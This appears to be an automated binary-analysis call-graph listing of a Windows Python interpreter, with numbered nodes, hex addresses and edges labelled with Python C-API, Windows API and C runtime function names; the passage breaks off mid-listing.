34524->34523 34525 6c579e5c 34524->34525 34525->34509 34526->34529 34530 6c579eec _PyMem_RawWcsdup 34526->34530 34527 6c579f29 _Py_PreInitializeFromConfig 34531 6c579f5f 34527->34531 34535 6c579f48 34527->34535 34528 6c579ed8 34528->34509 34529->34527 34529->34528 34530->34525 34530->34529 34534 6c579f67 _PyMem_RawWcsdup 34531->34534 34531->34535 34532 6c579fa4 _Py_PreInitializeFromConfig 34536 6c579fda 34532->34536 34540 6c579fc3 34532->34540 34533 6c579f53 34533->34509 34534->34535 34535->34532 34535->34533 34539 6c579fe2 _PyMem_RawWcsdup 34536->34539 34536->34540 34537 6c57a01f _PyWideStringList_Copy 34541 6c57a05d _PyWideStringList_Copy 34537->34541 34620 6c57a039 34537->34620 34538 6c579fce 34538->34509 34539->34540 34540->34537 34540->34538 34542 6c57a071 _PyWideStringList_Copy 34541->34542 34541->34620 34543 6c57a085 _PyWideStringList_Copy 34542->34543 34542->34620 34544 6c57a09f _Py_PreInitializeFromConfig 34543->34544 34543->34620 34545 6c57a0e1 34544->34545 34548 6c57a0ca 34544->34548 34545->34548 34549 6c57a0e9 _PyMem_RawWcsdup 34545->34549 34546 6c57a126 _Py_PreInitializeFromConfig 34550 6c57a15c 34546->34550 34554 6c57a145 34546->34554 34547 6c57a0d5 34547->34509 34548->34546 34548->34547 34549->34548 34553 6c57a164 _PyMem_RawWcsdup 34550->34553 34550->34554 34551 6c57a1a1 _Py_PreInitializeFromConfig 34555 6c57a1d7 34551->34555 34558 6c57a1c0 34551->34558 34552 6c57a150 34552->34509 34553->34554 34554->34551 34554->34552 34555->34558 34559 6c57a1df _PyMem_RawWcsdup 34555->34559 34556 6c57a21c _Py_PreInitializeFromConfig 34560 6c57a252 34556->34560 34563 6c57a23b 34556->34563 34557 6c57a1cb 34557->34509 34558->34556 34558->34557 34559->34558 34560->34563 34564 6c57a25a _PyMem_RawWcsdup 34560->34564 34561 6c57a297 _Py_PreInitializeFromConfig 34565 6c57a2cd 34561->34565 34569 6c57a2b6 34561->34569 34562 6c57a246 34562->34509 34563->34561 34563->34562 34564->34563 34568 6c57a2d5 _PyMem_RawWcsdup 34565->34568 34565->34569 34566 6c57a312 _Py_PreInitializeFromConfig 34570 6c57a348 34566->34570 34573 6c57a331 34566->34573 34567 6c57a2c1 34567->34509 34568->34569 34569->34566 34569->34567 34570->34573 34574 6c57a350 _PyMem_RawWcsdup 34570->34574 34571 6c57a38d _Py_PreInitializeFromConfig 34575 6c57a3c3 34571->34575 34578 6c57a3ac 34571->34578 34572 6c57a33c 34572->34509 34573->34571 34573->34572 34574->34573 34575->34578 34579 6c57a3cb _PyMem_RawWcsdup 34575->34579 34576 6c57a3b7 34576->34509 34577 6c57a408 _Py_PreInitializeFromConfig 34580 6c57a4ad 34577->34580 34584 6c57a496 34577->34584 34578->34576 34578->34577 34579->34578 34583 6c57a4b5 _PyMem_RawWcsdup 34580->34583 34580->34584 34581 6c57a4a1 34581->34509 34582 6c57a4ec _Py_PreInitializeFromConfig 34585 6c57a51f 34582->34585 34587 6c57a508 34582->34587 34583->34584 34584->34581 34584->34582 34586 6c57a527 _PyMem_RawWcsdup 34585->34586 34585->34587 34586->34587 34588 6c57a513 34587->34588 34589 6c57a55e _Py_PreInitializeFromConfig 34587->34589 34588->34509 34590 6c57a594 34589->34590 34593 6c57a57d 34589->34593 34590->34593 34594 6c57a59c _PyMem_RawWcsdup 34590->34594 34591 6c57a5d9 _Py_PreInitializeFromConfig 34595 6c57a60f 34591->34595 34599 6c57a5f8 34591->34599 34592 6c57a588 34592->34509 34593->34591 34593->34592 34594->34593 34598 6c57a617 _PyMem_RawWcsdup 34595->34598 34595->34599 34596 6c57a654 _Py_PreInitializeFromConfig 34600 6c57a6a2 34596->34600 34601 6c57a68b 34596->34601 34597 6c57a603 34597->34509 34598->34599 34599->34596 34599->34597 34600->34601 34602 6c57a6aa _PyMem_RawWcsdup 34600->34602 34603 6c57a6e7 _Py_PreInitializeFromConfig 34601->34603 34604 6c57a696 34601->34604 34602->34601 34605 6c57a71d 34603->34605 34609 6c57a706 34603->34609 34604->34509 34608 6c57a725 _PyMem_RawWcsdup 34605->34608 34605->34609 34606 6c57a762 _Py_PreInitializeFromConfig 34610 6c57a798 34606->34610 34613 6c57a781 34606->34613 34607 6c57a711 34607->34509 34608->34609 34609->34606 34609->34607 34610->34613 34614 6c57a7a0 _PyMem_RawWcsdup 34610->34614 34611 6c57a7dd _Py_PreInitializeFromConfig 34615 6c57a813 34611->34615 34618 6c57a7fc 34611->34618 34612 6c57a78c 34612->34509 34613->34611 34613->34612 34614->34613 34615->34618 34619 6c57a81b _PyMem_RawWcsdup 34615->34619 34616 6c57a807 34616->34509 34617 6c57a858 _PyWideStringList_Copy 34617->34620 34618->34616 34618->34617 34619->34618 34620->34509 34647 6c587790 34621->34647 34623 6c587fb8 __cftof 34635 6c587fc0 34623->34635 34667 6c587b60 34623->34667 34625 6c58800b 34626 6c58802a 34625->34626 34625->34635 34749 6c53b720 7 API calls __cftof 34625->34749 34628 6c4725a0 free 34626->34628 34629 6c588052 34626->34629 34626->34635 34628->34629 34629->34635 34707 6c5bb940 34629->34707 34631 6c588104 34631->34635 34727 6c548260 176 API calls 34631->34727 34633 6c588129 34634 6c588133 _PyImport_FixupBuiltin 34633->34634 34639 6c588186 34633->34639 34636 6c588153 PyModule_GetDict 34634->34636 34634->34639 34635->34516 34637 6c588166 34636->34637 34636->34639 34750 6c47e5c0 76 API calls 34637->34750 34639->34635 34728 6c587190 34639->34728 34640 6c58817e 34640->34639 34642 6c588193 PyDict_Copy 34640->34642 34642->34639 34643 6c5881b3 _PyDict_GetItemStringWithError 34642->34643 34643->34639 34645->34514 34646->34513 34648 6c5877c0 34647->34648 34649 6c587b19 34648->34649 34653 6c587865 34648->34653 34650 6c587b25 _PyErr_NoMemory 34649->34650 34666 6c587abe 34650->34666 34652 6c587b59 34652->34623 34654 6c58792f 34653->34654 34658 6c587967 34653->34658 34751 6c5ca596 5 API calls ___raise_securityfailure 34654->34751 34656 6c587963 34656->34623 34657 6c587997 PyUnicode_New 34659 6c5879be 34657->34659 34662 6c5879f6 34657->34662 34658->34657 34752 6c5ca596 5 API calls ___raise_securityfailure 34659->34752 34661 6c5879f2 34661->34623 34663 6c587a86 34662->34663 34662->34666 34753 6c5ca596 5 API calls ___raise_securityfailure 34663->34753 34665 6c587aba 34665->34623 34754 6c5ca596 5 API calls ___raise_securityfailure 34666->34754 34681 6c587b81 __cftof 34667->34681 34703 6c587d1b 34667->34703 34668 6c587d67 34756 6c47d5a0 110 API calls 34668->34756 34669 6c587d2c _PyStructSequence_InitType 34669->34668 34672 6c587d44 34669->34672 34671 6c587cf8 34671->34625 34672->34625 34673 6c587d73 34674 6c587bd2 34673->34674 34675 6c587d88 _PyStructSequence_InitType 34673->34675 34679 6c587dd0 34673->34679 34674->34625 34676 6c587da0 34675->34676 34675->34679 34676->34625 34677 6c587e51 PyType_Ready 34678 6c587e62 PyType_Ready 34677->34678 34686 6c587e10 34677->34686 34680 6c587e73 PyType_Ready 34678->34680 34678->34686 34679->34677 34682 6c4bd550 140 API calls 34679->34682 34679->34686 34683 6c587e84 PyType_Ready 34680->34683 34680->34686 34681->34671 34755 6c4a41e0 205 API calls 34681->34755 34685 6c587e0c 34682->34685 34683->34686 34687 6c587e95 PyType_Ready 34683->34687 34685->34677 34685->34686 34686->34625 34687->34686 34689 6c587eaa PyType_Ready 34687->34689 34688 6c587bca 34688->34674 34691 6c587be9 _PyStructSequence_InitType 34688->34691 34695 6c587c24 34688->34695 34689->34686 34690 6c587ebf PyType_Ready 34689->34690 34690->34686 34692 6c587ed4 PyType_Ready 34690->34692 34693 6c587c01 34691->34693 34691->34695 34692->34686 34698 6c587ee9 PyType_Ready 34692->34698 34693->34625 34694 6c587c81 PyType_Ready 34696 6c587c9c PyType_Ready 34694->34696 34697 6c587c59 34694->34697 34695->34694 34699 6c4bd550 140 API calls 34695->34699 34696->34697 34700 6c587cb7 PyType_Ready 34696->34700 34697->34625 34698->34686 34701 6c587efe PyType_Ready 34698->34701 34702 6c587c55 34699->34702 34700->34697 34700->34703 34701->34686 34704 6c587f13 34701->34704 34702->34694 34702->34697 34703->34668 34703->34669 34757 6c564d20 _PyObject_New 34704->34757 34706 6c587f18 PyDict_SetItemString 34706->34686 34708 6c4725a0 free 34707->34708 34709 6c5bb96c 34708->34709 34710 6c5bb974 _PyModule_CreateInitialized 34709->34710 34726 6c5bbae4 34709->34726 34711 6c5bb9b3 PyModule_GetDict 34710->34711 34712 6c5bb992 34710->34712 34713 6c5bb9c6 PyDict_SetItemString 34711->34713 34711->34726 34712->34631 34714 6c5bb9ea __acrt_iob_func _fileno __acrt_iob_func _fileno 34713->34714 34713->34726 34715 6c5bba3a _PyObject_New 34714->34715 34716 6c5bba1d __acrt_iob_func _fileno 34714->34716 34717 6c5bbb0e 34715->34717 34718 6c5bba51 __cftof 34715->34718 34716->34715 34716->34717 34717->34631 34718->34717 34719 6c5bba6c PyDict_SetItem 34718->34719 34719->34717 34720 6c5bba7f PyDict_SetItemString 34719->34720 34720->34717 34721 6c5bba92 34720->34721 34758 6c5ba4a0 110 API calls __cftof 34721->34758 34723 6c5bbab1 34724 6c5bbac9 _PyImport_FixupBuiltin 34723->34724 34725 6c5bbab9 34723->34725 34724->34726 34725->34631 34726->34631 34727->34633 34729 6c5871c0 PyUnicode_FromString 34728->34729 34730 6c5871b3 PySys_FormatStderr 34728->34730 34731 6c5871d9 PyUnicode_InternInPlace 34729->34731 34745 6c5872f7 34729->34745 34730->34729 34732 6c5871f2 PyImport_ImportFrozenModuleObject 34731->34732 34731->34745 34733 6c587204 34732->34733 34734 6c58721c PyImport_AddModule 34733->34734 34733->34745 34735 6c587235 34734->34735 34734->34745 34736 6c58724e 34735->34736 34737 6c587241 PySys_FormatStderr 34735->34737 34738 6c587270 Py_BuildValue 34736->34738 34736->34745 34737->34736 34739 6c58728d _PyNamespace_New 34738->34739 34738->34745 34740 6c58729d 34739->34740 34740->34745 34759 6c576710 34740->34759 34742 6c5872bd 34742->34745 34771 6c577a00 34742->34771 34744 6c5872f3 34744->34745 34746 6c587342 PyObject_SetItem 34744->34746 34745->34635 34747 6c587354 34746->34747 34747->34745 34748 6c587364 PyObject_CallMethod 34747->34748 34748->34745 34749->34626 34750->34640 34751->34656 34752->34661 34753->34665 34754->34652 34755->34688 34756->34673 34757->34706 34758->34723 34761 6c576723 34759->34761 34760 6c57675f 34760->34742 34761->34760 34762 6c576747 _PyUnicode_EqualToASCIIString 34761->34762 34762->34761 34763 6c576771 34762->34763 34764 6c576778 PyImport_AddModuleObject 34763->34764 34765 6c57678e 34763->34765 34764->34760 34766 6c5767d7 34765->34766 34767 6c5767e0 PyModule_FromDefAndSpec2 34765->34767 34768 6c5767a0 PyType_IsSubtype 34765->34768 34766->34742 34767->34742 34768->34767 34769 6c5767b2 PyModule_GetDef 34768->34769 34769->34766 34770 6c5767bf _PyImport_FixupExtensionObject 34769->34770 34770->34766 34772 6c577a53 34771->34772 34773 6c577a10 PyType_IsSubtype 34771->34773 34775 6c577a4d 34772->34775 34776 6c577a5a PyModule_GetState 34772->34776 34774 6c577a22 PyType_IsSubtype 34773->34774 34773->34775 34774->34772 34777 6c577a34 _PyErr_SetString 34774->34777 34775->34744 34776->34775 34778 6c577a67 PyModule_ExecDef 34776->34778 34777->34775 34778->34744 34779 6c589190 34780 6c5891c5 _PyRuntime_Initialize 34779->34780 34781 6c5891e6 _Py_PreInitializeFromConfig 34780->34781 34782 6c58920a 34781->34782 34788 6c5893b4 34781->34788 34789 6c579ac0 _PyConfig_InitCompatConfig 34782->34789 34784 6c589216 34785 6c579da0 44 API calls 34784->34785 34786 6c58924a PyConfig_Clear 34785->34786 34786->34788 34789->34784 33818 6c4a71c0 33821 6c4a7840 33818->33821 33822 6c4a784a 33821->33822 33823 6c4a71d2 33821->33823 33822->33823 33825 6c4a6240 free 33822->33825 33825->33823 33826 6c476dd0 PyUnicode_FromString 33827 6c476de6 33826->33827 33828 6c476ded PyUnicode_InternInPlace PyDict_SetItem 33826->33828 33829 6c476e11 33828->33829 33830 6c5766c0 PySys_GetObject PySys_GetObject 33831 6c576705 33830->33831 33832 6c5766ec 33830->33832 33832->33831 33835 6c5764c0 33832->33835 33834 6c5766fd 33836 6c5764e5 _PyErr_Format 33835->33836 33837 6c576511 33835->33837 33839 6c576508 33836->33839 33838 6c57651c PyDict_GetItemWithError 33837->33838 33837->33839 33840 6c576531 33838->33840 33841 6c5766a0 33838->33841 33839->33834 33840->33839 33842 6c576536 PyDict_SetItem 33840->33842 33841->33834 33842->33839 33852 6c57654c 33842->33852 33843 6c576653 33843->33834 33844 6c576560 PyList_GetItem 33844->33839 33844->33852 33845 6c5766a9 _Py_FatalError_TstateNULL 33846 6c5765fe _PyObject_MakeTpCall 33846->33852 33847 6c576617 PyErr_GivenExceptionMatches 33847->33839 33849 6c576634 _PyErr_Clear 33847->33849 33848 6c576665 PyDict_SetItem 33848->33839 33849->33843 33849->33844 33850 6c5765b9 _PyErr_Format 33850->33852 33851 6c5765e5 _PyErr_FormatFromCauseTstate 33851->33852 33852->33843 33852->33844 33852->33845 33852->33846 33852->33847 33852->33848 33852->33850 33852->33851 34790 6c577400 34791 6c577426 _PyErr_SetString 34790->34791 34794 6c57744a 34790->34794 34806 6c576c30 PyType_IsSubtype _PyUnicode_EqualToASCIIString _PyUnicode_EqualToASCIIString _PyUnicode_EqualToASCIIString 34791->34806 34793 6c577441 34794->34791 34795 6c5774e5 34794->34795 34798 6c575700 34795->34798 34797 6c5774f6 34799 6c575711 _PyErr_SetString 34798->34799 34800 6c57572a 34798->34800 34799->34797 34801 6c57574a PyObject_GetItem 34800->34801 34802 6c575738 PyDict_GetItemWithError 34800->34802 34803 6c575758 PyErr_GivenExceptionMatches 34801->34803 34805 6c575746 34801->34805 34802->34805 34804 6c57576d _PyErr_Clear 34803->34804 34803->34805 34804->34805 34805->34797 34806->34793 34807 6c47fb90 34808 6c47fba5 PyErr_Format 34807->34808 34809 6c47fbc0 34807->34809 34810 6c47fbdb PyUnicode_FromString 34809->34810 34811 6c47fbca 34809->34811 34812 6c47fbef PyImport_Import 34810->34812 34815 6c47fc32 34810->34815 34813 6c47fc00 34812->34813 34814 6c47fc10 _PyObject_CallMethodId_SizeT 34813->34814 34813->34815 34814->34815 33853 6c5885c0 33854 6c5885fc _PyRuntime_Initialize 33853->33854 33855 6c588628 33854->33855 33856 6c58860e 33854->33856 33855->33856 33861 6c588657 33855->33861 33862 6c5ca596 5 API calls ___raise_securityfailure 33856->33862 33858 6c588624 33860 6c58881e 33863 6c5ca596 5 API calls ___raise_securityfailure 33861->33863 33862->33858 33863->33860 33864 6c583dc0 PyType_Ready 33865 6c583ddc strrchr 33864->33865 33866 6c583dd5 33864->33866 33867 6c583dee PyModule_AddObjectRef 33865->33867 33868 6c583e02 PyModule_AddObjectRef 33865->33868 34816 6c585300 34817 6c58531a 34816->34817 34818 6c58530c 34816->34818 34850 6c4a6240 free 34817->34850 34845 6c5841e0 34818->34845 34821 6c585316 34822 6c58536a _PyMem_RawWcsdup _PyMem_RawWcsdup _PyMem_RawWcsdup 34824 6c5853d7 34822->34824 34824->34821 34851 6c5852f0 __acrt_iob_func _fileno __cftof 34824->34851 34852 6c4a6240 free 34845->34852 34847 6c584235 34853 6c4a6240 free 34847->34853 34848 6c584260 34848->34821 34850->34822 34852->34847 34853->34848 34854 6c4a7190 34855 6c4a719d 34854->34855 34856 6c4a71a1 34854->34856 34858 6c4a78d0 3 API calls 34856->34858 34857 6c4a71b1 34858->34857 34859 6c5b1280 34880 6c586da0 34859->34880 34861 6c5b1358 34862 6c5b128e __cftof 34862->34861 34863 6c5b1352 34862->34863 34865 6c5b12d4 34862->34865 34864 6c586eb0 __cftof free 34863->34864 34864->34861 34866 6c5b132f _PyAST_Compile 34865->34866 34867 6c5b12e0 34865->34867 34887 6c586eb0 34866->34887 34891 6c598b30 148 API calls 34867->34891 34871 6c5b12f5 34872 6c5b131b 34871->34872 34873 6c5b12fd 34871->34873 34874 6c586eb0 __cftof free 34872->34874 34892 6c59cd70 38 API calls 34873->34892 34876 6c5b1323 34874->34876 34877 6c5b1307 34878 6c586eb0 __cftof free 34877->34878 34879 6c5b130f 34878->34879 34881 6c586db6 34880->34881 34882 6c586dbf 34881->34882 34886 6c4a7620 malloc 34881->34886 34883 6c58c540 __cftof 2 API calls 34882->34883 34885 6c586dd3 __cftof 34882->34885 34884 6c586eae 34883->34884 34885->34862 34886->34882 34888 6c586ed9 34887->34888 34889 6c586ebd 34887->34889 34889->34888 34890 6c4a7840 free 34889->34890 34890->34889 34891->34871 34892->34877 33869 6c569070 _set_thread_local_invalid_parameter_handler _get_osfhandle _set_thread_local_invalid_parameter_handler 33870 6c5690af SetLastError 33869->33870 33871 6c5690ca memset GetFileType 33869->33871 33899 6c5ca596 5 API calls ___raise_securityfailure 33870->33899 33872 6c5690e5 GetLastError 33871->33872 33873 6c56911a 33871->33873 33876 6c5690f5 _errno 33872->33876 33892 6c5691a6 33872->33892 33877 6c569161 GetFileInformationByHandle 33873->33877 33878 6c56911f 33873->33878 33875 6c5690c6 33881 6c569104 33876->33881 33879 6c569170 GetLastError 33877->33879 33880 6c56919b 33877->33880 33882 6c569124 33878->33882 33883 6c569140 33878->33883 33903 6c47ac50 33879->33903 33905 6c568f10 memset __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 33880->33905 33900 6c5ca596 5 API calls ___raise_securityfailure 33881->33900 33901 6c5ca596 5 API calls ___raise_securityfailure 33882->33901 33889 6c569145 33883->33889 33883->33892 33888 6c5691c9 33902 6c5ca596 5 API calls ___raise_securityfailure 33889->33902 33890 6c56917d _errno 33904 6c5ca596 5 API calls ___raise_securityfailure 33890->33904 33906 6c5ca596 5 API calls ___raise_securityfailure 33892->33906 33893 6c56913c 33895 6c56915d 33897 6c569116 33898 6c569197 33899->33875 33900->33897 33901->33893 33902->33895 33903->33890 33904->33898 33905->33892 33906->33888 33907 6c566570 33908 6c566597 FormatMessageW 33907->33908 33909 6c56658f GetLastError 33907->33909 33910 6c5665b7 PyUnicode_FromFormat 33908->33910 33915 6c5665cf PyUnicode_FromWideChar 33908->33915 33909->33908 33911 6c566609 33910->33911 33913 6c56661d Py_BuildValue 33911->33913 33914 6c56660d LocalFree 33911->33914 33917 6c56664f 33913->33917 33915->33911 33918 6c56665f _PyObject_Call 33917->33918 33919 6c5666a8 LocalFree 33917->33919 33920 6c56667a __cftof 33918->33920 33920->33919 33921 5410f2 33922 5410fe ___scrt_is_nonwritable_in_current_image 33921->33922 33945 541410 33922->33945 33924 541105 33925 541258 33924->33925 33929 54112f 33924->33929 33952 541710 6 API calls 33925->33952 33927 54125f exit 33928 541265 _exit 33927->33928 33930 541133 _initterm_e 33929->33930 33934 54117c ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 33929->33934 33931 54114e 33930->33931 33932 54115f _initterm 33930->33932 33932->33934 33933 5411d0 33949 54182b memset GetStartupInfoW 33933->33949 33934->33933 33937 5411c8 _register_thread_local_exe_atexit_callback 33934->33937 33936 5411d5 _get_wide_winmain_command_line 33950 541000 __p___wargv __p___argc Py_Main 33936->33950 33937->33933 33939 5411ea 33951 541864 GetModuleHandleW 33939->33951 33941 5411f1 33941->33927 33942 5411f5 33941->33942 33943 5411fe ___scrt_uninitialize_crt 33942->33943 33944 5411f9 _cexit 33942->33944 33943->33931 33944->33943 33946 541419 33945->33946 33953 5419e7 IsProcessorFeaturePresent 33946->33953 33948 541425 ___scrt_uninitialize_crt 33948->33924 33949->33936 33950->33939 33951->33941 33952->33927 33953->33948 33954 6c466ee0 33955 6c466ff6 _PyErr_Format 33954->33955 33956 6c466eff 33954->33956 33956->33955 33958 6c466f4d 33956->33958 33959 6c466f19 33956->33959 33965 6c466f5a 33956->33965 33958->33955 33960 6c466f56 33958->33960 33959->33965 33967 6c45ec40 33959->33967 33961 6c466f86 PyObject_Realloc 33960->33961 33960->33965 33963 6c466f9d 33961->33963 33961->33965 33966 6c466faf _PyErr_NoMemory 33963->33966 33964 6c466f2a 33968 6c45ec52 33967->33968 33969 6c45ec69 33967->33969 33968->33964 33970 6c45ec71 33969->33970 33972 6c45ec99 33969->33972 33971 6c45ec81 _PyErr_SetString 33970->33971 33971->33964 33973 6c45eca0 33972->33973 33977 6c4a7620 33972->33977 33974 6c45ed11 _PyErr_NoMemory 33973->33974 33975 6c45ece4 33973->33975 33974->33964 33975->33964 33978 6c4a7632 33977->33978 33979 6c4a763e 33978->33979 33981 6c4a61d0 malloc 33978->33981 33979->33973 33981->33979 34893 6c569b30 _set_thread_local_invalid_parameter_handler 34894 6c569b60 _Py_FatalError_TstateNULL 34893->34894 34896 6c569c80 _set_thread_local_invalid_parameter_handler 34894->34896 34903 6c569cbc 34896->34903 34897 6c569e12 _isatty 34899 6c569e7b 34897->34899 34897->34903 34898 6c569eb9 _Py_FatalError_TstateNULL 34901 6c569ed0 34898->34901 34899->34898 34902 6c569d3f _errno _write _errno 34902->34903 34903->34897 34903->34898 34903->34899 34904 6c548c00 34903->34904 34905 6c548cd2 34904->34905 34906 6c548c1a EnterCriticalSection 34904->34906 34907 6c58c540 __cftof 2 API calls 34905->34907 34910 6c548c5d LeaveCriticalSection 34906->34910 34911 6c548c3d ReleaseSemaphore 34906->34911 34909 6c548ce1 34907->34909 34912 6c58c540 __cftof 2 API calls 34909->34912 34913 6c548c71 34910->34913 34914 6c548ccb 34910->34914 34911->34909 34911->34910 34915 6c548cf0 34912->34915 34913->34914 34916 6c548c75 EnterCriticalSection 34913->34916 34914->34902 34917 6c58c540 __cftof 2 API calls 34915->34917 34918 6c548c86 34916->34918 34924 6c548cc0 34916->34924 34922 6c548cff 34917->34922 34925 6c548b10 GetCurrentThreadId GetCurrentThreadId 34918->34925 34920 6c548cc8 LeaveCriticalSection 34920->34914 34921 6c548c8e LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 34921->34920 34923 6c548cb8 34921->34923 34922->34902 34923->34915 34923->34924 34924->34920 34925->34921 34926 6c467ea0 34927 6c467ee2 memcpy _PyObject_FastCallDictTstate 34926->34927 34928 6c467ee8 34926->34928 34933 6c467f42 34927->34933 34928->34927 34930 6c467f66 34928->34930 34931 6c467f97 34930->34931 34932 6c467f77 __cftof 34930->34932 34935 6c58c540 __cftof 2 API calls 34931->34935 34947 6c5ca596 5 API calls ___raise_securityfailure 34932->34947 34946 6c5ca596 5 API calls ___raise_securityfailure 34933->34946 34937 6c467fa6 34935->34937 34936 6c467f62 34940 6c468036 34937->34940 34941 6c467fd9 _PyErr_SetString 34937->34941 34939 6c467f93 34949 6c5ca596 5 API calls ___raise_securityfailure 34940->34949 34948 6c5ca596 5 API calls ___raise_securityfailure 34941->34948 34944 6c467ffc 34945 6c468045 34946->34936 34947->34939 34948->34944 34949->34945 34950 6c4681a0 34951 6c4681b2 34950->34951 34952 6c46821b 34950->34952 34951->34952 34955 6c4681b9 PyObject_GetAttrString 34951->34955 34953 6c468235 34952->34953 34954 6c468221 _PyErr_SetString 34952->34954 34954->34953 34955->34953 34956 6c4681c9 34955->34956 34957 6c4681d2 _PyErr_Format 34956->34957 34958 6c4681ed 34956->34958 34957->34958 33982 6c4702e0 33984 6c4702f5 33982->33984 33983 6c470306 PyType_GenericAlloc 33986 6c47039c 33983->33986 33987 6c47037e PyUnicode_FromString 33983->33987 33984->33983 33988 6c470335 PyErr_Format 33984->33988 33987->33986 33990 6c4703a1 PyUnicode_InternInPlace 33987->33990 33990->33986 33991 6c58e7f0 33992 6c58e831 33991->33992 33993 6c58e807 33991->33993 33995 6c58e838 CloseHandle DeleteCriticalSection 33992->33995 33996 6c58e85f PyThread_acquire_lock_timed 33992->33996 33993->33992 34021 6c58f440 29 API calls __cftof 33993->34021 34000 6c58e855 33995->34000 33997 6c58e93a 33996->33997 33998 6c58e88b 33996->33998 34022 6c58c540 __acrt_iob_func _fileno 33997->34022 33998->33997 34002 6c58e8a4 33998->34002 34000->33996 34001 6c58e949 34003 6c58c540 __cftof 2 API calls 34001->34003 34002->34001 34004 6c58e8ae 34002->34004 34005 6c58e958 34003->34005 34004->34005 34006 6c58e8c8 34004->34006 34007 6c58c540 __cftof 2 API calls 34005->34007 34008 6c58e8fc 34006->34008 34009 6c58e8cf EnterCriticalSection 34006->34009 34010 6c58e967 34007->34010 34013 6c58e903 CloseHandle DeleteCriticalSection 34008->34013 34017 6c58e923 34008->34017 34011 6c58e8e4 ReleaseSemaphore 34009->34011 34012 6c58e8f5 LeaveCriticalSection 34009->34012 34014 6c58e979 34010->34014 34015 6c58e981 _Py_FatalError_TstateNULL 34010->34015 34011->34012 34012->34008 34016 6c58e920 34013->34016 34018 6c58e980 34014->34018 34019 6c58c540 __cftof 2 API calls 34014->34019 34015->34014 34016->34017 34020 6c58e99a __cftof 34019->34020 34021->33993 34023 6c58c3c0 34022->34023 34024 6c4a0760 PyModule_GetNameObject 34025 6c4a085c 34024->34025 34026 6c4a0780 PyUnicode_AsUTF8AndSize 34024->34026 34026->34025 34029 6c4a07a6 34026->34029 34028 6c4a083f 34030 6c4a07bd __cftof 34029->34030 34031 6c4a07f9 memset 34029->34031 34033 6c4a0807 34029->34033 34031->34033 34032 6c4a0874 PyErr_Format 34033->34028 34033->34032 34034 6c4a0848 34033->34034 34034->34025 34035 6c4a084e PyErr_Format 34034->34035 34035->34025 34959 6c4a08a0 PyModule_GetNameObject 34960 6c4a08be 34959->34960 34961 6c4a08b7 34959->34961 34964 6c4a0230 34960->34964 34963 6c4a08ca 34965 6c4a024a 34964->34965 34966 6c4a029e __cftof 34964->34966 34965->34966 34967 6c4a0258 PyCMethod_New 34965->34967 34966->34963 34967->34966 34968 6c4a026d PyObject_SetAttrString 34967->34968 34968->34965 34968->34966 34969 6c4a2fa0 34970 6c4a2fb3 34969->34970 34971 6c4a2fc4 PyUnicode_FromString 34969->34971 34972 6c4a3010 34971->34972 34973 6c4a2fd6 PyUnicode_InternInPlace 34971->34973 34973->34972 34974 6c4a2fe9 PyObject_SetAttr 34973->34974 34975 6c4a2ffd 34974->34975 34036 6c4bd960 34037 6c4bd975 34036->34037 34039 6c4bd993 34036->34039 34040 6c4bd550 34037->34040 34041 6c4bd581 34040->34041 34042 6c4bd564 PyErr_Format 34040->34042 34047 6c4bd59f 34041->34047 34105 6c4725a0 34041->34105 34043 6c4bd577 34042->34043 34043->34039 34045 6c4bd5e2 PyType_Ready 34045->34043 34046 6c4bd5ef 34045->34046 34048 6c4bd612 34046->34048 34049 6c4bd624 PyTuple_Pack 34046->34049 34047->34043 34047->34045 34047->34046 34048->34043 34074 6c4b7d60 34048->34074 34049->34048 34051 6c4bd646 34051->34043 34052 6c4bd691 __cftof 34051->34052 34053 6c4bd739 PyErr_Format 34051->34053 34052->34043 34056 6c4bd6e9 PyDict_Contains 34052->34056 34071 6c4bd734 34052->34071 34053->34039 34057 6c4bd6fb 34056->34057 34056->34071 34057->34043 34059 6c4bd701 PyCMethod_New 34057->34059 34059->34043 34060 6c4bd71d __cftof 34059->34060 34064 6c4bd75c PyDict_SetItem 34060->34064 34060->34071 34061 6c4bd826 34063 6c4bd88a PyErr_Format 34061->34063 34065 6c4bd8aa __cftof 34061->34065 34063->34039 34064->34071 34065->34043 34067 6c4bd8cb PyDict_Contains 34065->34067 34068 6c4bd911 34065->34068 34066 6c4bd7c6 34066->34043 34066->34061 34111 6c4bc430 PyDict_Contains PyDict_Contains __cftof 34066->34111 34067->34043 34072 6c4bd8dd __cftof 34067->34072 34068->34043 34112 6c4bd9c0 free PyLong_FromUnsignedLong PyWeakref_NewRef PyDict_SetItem 34068->34112 34069 6c4bd77e 34069->34039 34071->34069 34084 6c4bd2a0 34071->34084 34072->34043 34072->34068 34073 6c4bd8fa PyDict_SetItem 34072->34073 34073->34043 34073->34068 34075 6c4b7d78 34074->34075 34113 6c4b7bd0 88 API calls __cftof 34075->34113 34077 6c4b7d7f 34078 6c4b7da6 34077->34078 34114 6c4b56e0 PyType_IsSubtype _PyType_Lookup 34077->34114 34078->34051 34080 6c4b7ddd 34115 6c4b56e0 PyType_IsSubtype _PyType_Lookup 34080->34115 34082 6c4b7dea PyType_Modified 34083 6c4b7dfa 34082->34083 34083->34051 34085 6c4bd375 34084->34085 34104 6c4bd2c1 34084->34104 34116 6c4bc120 34085->34116 34087 6c4bd443 34088 6c4bd4ef 34087->34088 34090 6c4bd464 PyType_GenericAlloc 34087->34090 34128 6c4bd160 7 API calls __cftof 34088->34128 34089 6c4bd37c 34089->34087 34092 6c4bd3b0 PyType_GenericAlloc 34089->34092 34103 6c4bd4f6 34089->34103 34094 6c4bd47d PyUnicode_FromString 34090->34094 34090->34103 34091 6c4bd2e9 PyDict_Contains 34091->34104 34095 6c4bd3c9 PyUnicode_FromString 34092->34095 34092->34103 34096 6c4bd498 PyUnicode_InternInPlace 34094->34096 34094->34103 34097 6c4bd3e4 PyUnicode_InternInPlace 34095->34097 34095->34103 34098 6c4bd4ae PyDict_SetDefault 34096->34098 34096->34103 34101 6c4bd3fe PyDict_SetDefault 34097->34101 34097->34103 34098->34087 34098->34103 34099 6c4bd309 PyDict_SetItem 34099->34103 34099->34104 34100 6c4bd325 PyDescr_NewWrapper 34102 6c4bd33d PyDict_SetItem 34100->34102 34100->34103 34101->34089 34101->34103 34102->34103 34102->34104 34103->34043 34103->34066 34110 6c4bc2c0 8 API calls 34103->34110 34104->34085 34104->34091 34104->34099 34104->34100 34104->34103 34106 6c4725c0 34105->34106 34107 6c4725d0 34105->34107 34106->34047 34107->34106 34129 